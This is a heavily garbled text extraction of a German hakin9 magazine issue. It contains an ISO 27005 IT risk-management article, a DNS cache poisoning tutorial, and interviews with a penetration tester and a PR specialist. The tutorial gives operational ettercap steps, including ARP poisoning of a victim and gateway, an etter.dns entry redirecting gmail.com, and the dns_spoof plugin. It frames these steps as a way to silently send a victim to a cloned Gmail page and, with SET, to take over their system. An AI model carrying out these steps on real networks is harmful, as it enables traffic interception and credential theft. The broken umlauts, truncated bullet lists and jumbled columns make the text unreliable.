Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
